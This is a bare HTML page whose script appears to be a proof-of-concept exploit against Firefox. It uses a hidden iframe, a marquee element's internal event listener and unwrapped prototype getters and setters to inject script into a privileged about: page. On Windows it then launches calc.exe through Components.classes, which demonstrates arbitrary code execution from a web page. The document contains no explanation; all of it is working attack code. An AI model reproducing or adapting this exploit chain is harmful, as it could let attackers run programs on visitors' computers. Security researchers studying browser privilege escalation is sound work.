<!doctype html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
</head>
<body>
<iframe style="visibility:hidden;display:none"></iframe>
<marquee></marquee>
<script>
var c;
navigator.oscpu.indexOf("Windows") == -1 ? (c = "alert(Components.classes)") : (c = "f=Components.classes[\\\'@mozilla.org/file/local;1\\\'].createInstance(Components.interfaces.nsILocalFile);f.initWithPath(\\\'c:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\calc.exe\\\');f.launch()");
var i = document.getElementsByTagName("iframe")[0];
var m = document.getElementsByTagName("marquee")[0];
var evt = document.createEvent("MouseEvents");
evt.initMouseEvent("click", 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null);

window.onload = function(){
   var s1 = "frames[0].location.href='about:'";
   var s2 = "cd = XPCNativeWrapper.unwrap(window).i.contentDocument;";
   s2 += "p = Object.getPrototypeOf;";
   s2 += "o = p(p(p(p(p(cd)))));";
   s2 += "g = Object.getOwnPropertyDescriptor(o,'__lookupGetter__').value;";
   s2 += "s = Object.getOwnPropertyDescriptor(o,'__lookupSetter__').value;";
   s2 += "b = g.call(cd,'body').call(cd);";
   s2 += "h = s.call(b,'innerHTML');";
   s2 += "h.call(b,'<img src=\\\"about:logo\\\" onload=\\\"" + c + "\\\" />')";
   i.onload = function(){
      m._setEventListener("click", s2);
      m.dispatchEvent(evt);
   };
   m._setEventListener("click", s1);
   m.dispatchEvent(evt);
}
</script>
</body>
</html>